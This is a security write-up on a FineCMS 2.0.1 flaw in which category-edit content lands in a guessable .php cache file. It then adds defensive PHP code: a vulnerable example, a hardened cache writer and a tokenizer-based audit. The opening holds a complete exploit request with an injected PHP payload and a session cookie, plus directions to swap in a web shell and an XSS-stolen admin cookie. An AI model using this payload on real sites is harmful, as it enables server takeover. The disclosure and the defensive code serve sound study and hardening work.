FineCMS has a caching feature, just as WordPress once did. The cache file name is not random and the file extension is .php, so the back-end cache feature can be used to get a shell.

Below is the payload

POST /index.php?s=admin&c=category&a=edit&catid=13 HTTP/1.1
Host: finecms2.0.1
Content-Length: 813
Cache-Control: max-age=0
Origin: http://finecms2.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://finecms2.0.1/index.php?s=admin&c=category&a=edit&catid=13
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: finecms_b1bf4_member_id=1; finecms_b1bf4_member_code=5bd1ebd88ad1c863ecc2; cod=10; csd=13; finecms_b1bf4_ci_session=a%3A7%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221f2b4dc45dd971bb0cd46febe32f5967%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_11_5%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F51.0.2704.106+Safari%2F537.3%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1468985849%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A17%3A%22error_admin_login%22%3Bi%3A5%3Bs%3A7%3A%22user_id%22%3Bs%3A1%3A%221%22%3B%7D0edaafa3cae30c09ebb401c1ff2d76dd80c0ec91
Connection: close

catid=13&typeid=2&data%5Bparentid%5D=10&data%5Bcatname%5D=123&data%5Bcatdir%5D=123&setting%5Bdocument%5D=&data%5Bimage%5D=&data%5Bismenu%5D=1&data%5Burlpath%5D=&abc=10&data%5Bpagesize%5D=20&data%5Bcategorytpl%5D=&data%5Blisttpl%5D=&data%5Bshowtpl%5D=page.html&data%5Bmeta_title%5D=&data%5Bmeta_keywords%5D=&data%5Bmeta_description%5D=&setting%5Bverifypost%5D=0&setting%5Badminpost%5D=0&setting%5Bmemberpost%5D=0&setting%5Bguestpost%5D=0&setting%5Bguestpost%5D=&setting%5Burl%5D%5Buse%5D=0&setting%5Burl%5D%5Btohtml%5D=0&setting%5Burl%5D%5Bhtmldir%5D=html&setting%5Burl%5D%5Blist%5D=&setting%5Burl%5D%5Blist_page%5D=&setting%5Burl%5D%5Bshow%5D=&setting%5Burl%5D%5Bshow_page%5D=&setting%5Burl%5D%5Bcatjoin%5D=%2F&submit=%E6%8F%90%E4%BA%A4&data%5Bcontent%5D=%3Cp%3E%0D%0A%09"}//%0D
<?php phpinfo();?>
%0D//{"%3C%2Fp%3E

Just replace phpinfo(); with a one-line shell, and replace the cookie with an administrator's cookie obtained via XSS.
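The root cause above is a cache writer that splices editor-supplied content into a PHP file with a guessable name under a web-reachable directory. The following is an added illustration, not FineCMS's own code: a sketch of that vulnerable pattern, a hardened writer (data stored as a PHP literal via var_export, file name derived from a per-site secret, atomic restricted write into a directory meant to live outside the document root), and a tokenizer-based check that flags cache files in which content has escaped its string literal. Every function and constant name here, including CACHE_SECRET and the cache path layout, is a hypothetical placeholder, and the sample content is constructed to have the same shape as the payload above with a harmless marker in place of phpinfo().

```php
<?php
// Added example, not FineCMS code. All names are hypothetical.

// Placeholder: a per-installation random secret loaded from configuration.
const CACHE_SECRET = 'replace-with-per-install-random-secret';

// Hypothetical vulnerable pattern: editor content is concatenated straight into
// the source of a file named after the category id, in a web-reachable cache
// directory. Nothing is escaped, so a quote or "?>" in the content ends the
// data and whatever follows is tokenised as PHP or inline HTML.
function buildCacheUnsafe(int $catid, string $content): array
{
    $path = "cache/category_{$catid}.php";          // guessable name, served as PHP
    $src  = '<?php $cache = "' . $content . '";';   // no escaping
    return [$path, $src];
}

// Hardened writer: store data rather than code, use an unguessable name,
// write atomically with a restrictive mode.
function writeCacheSafe(string $cacheDir, int $catid, array $data): string
{
    // var_export() emits a PHP literal; quotes, "?>" and "<?php" inside the
    // content stay inside a single-quoted string and are never code.
    $src = "<?php\n// generated cache file\nreturn " . var_export($data, true) . ";\n";

    // The file name is an HMAC of the cache key under the site secret, so it
    // cannot be derived from the category id without that secret.
    $name = hash_hmac('sha256', "category_{$catid}", CACHE_SECRET);
    $path = rtrim($cacheDir, '/') . "/{$name}.php";

    // Temp file plus rename; $cacheDir should sit outside the document root so
    // nothing in it is reachable over HTTP at all.
    $tmp = $path . '.' . bin2hex(random_bytes(8)) . '.tmp';
    file_put_contents($tmp, $src, LOCK_EX);
    chmod($tmp, 0640);
    rename($tmp, $path);
    return $path;
}

function readCacheSafe(string $path): ?array
{
    if (!is_file($path)) {
        return null;
    }
    $data = include $path;          // a clean cache file only returns an array
    return is_array($data) ? $data : null;
}

// Defender's check: a clean cache file starts with a single "<?php" and never
// leaves PHP mode. A second open tag, a close tag or inline HTML means content
// broke out of its literal and would run when the file is executed.
function isCleanCacheSource(string $src): bool
{
    $tokens = token_get_all($src);
    if (!$tokens || !is_array($tokens[0]) || $tokens[0][0] !== T_OPEN_TAG) {
        return false;
    }
    $forbidden = [T_OPEN_TAG, T_OPEN_TAG_WITH_ECHO, T_CLOSE_TAG, T_INLINE_HTML];
    foreach (array_slice($tokens, 1) as $tok) {
        if (is_array($tok) && in_array($tok[0], $forbidden, true)) {
            return false;
        }
    }
    return true;
}

// Run the check over every .php file in an existing cache directory.
function auditCacheDir(string $cacheDir): array
{
    $suspicious = [];
    foreach (glob(rtrim($cacheDir, '/') . '/*.php') as $file) {
        if (!isCleanCacheSource((string) file_get_contents($file))) {
            $suspicious[] = $file;
        }
    }
    return $suspicious;
}

// Constructed input with the same shape as the payload in the write-up,
// using a harmless echo in place of phpinfo().
$content = "<p>\r\n\t\"}//\r\n<?php echo 'marker'; ?>\r\n//{\"</p>";

[$unsafePath, $unsafeSrc] = buildCacheUnsafe(13, $content);
if (isCleanCacheSource($unsafeSrc)) {
    throw new RuntimeException("check failed to flag {$unsafePath}");
}

$dir = sys_get_temp_dir() . '/cache_demo_' . bin2hex(random_bytes(4));
mkdir($dir, 0750);
$safePath = writeCacheSafe($dir, 13, ['catname' => '123', 'content' => $content]);
$back = readCacheSafe($safePath);
if ($back === null || $back['content'] !== $content) {
    throw new RuntimeException('safe cache did not round-trip the content as data');
}
if (auditCacheDir($dir) !== []) {
    throw new RuntimeException('audit flagged a file written by the hardened writer');
}
echo "unsafe source flagged, hardened cache clean: {$safePath}\n";
```

The tokenizer check is the part worth keeping as a scheduled job or an incident-response triage step: token_get_all only lexes the file, so it can be run over a cache directory without executing anything in it, and any file that opens PHP mode more than once or drops into inline HTML is worth pulling for review.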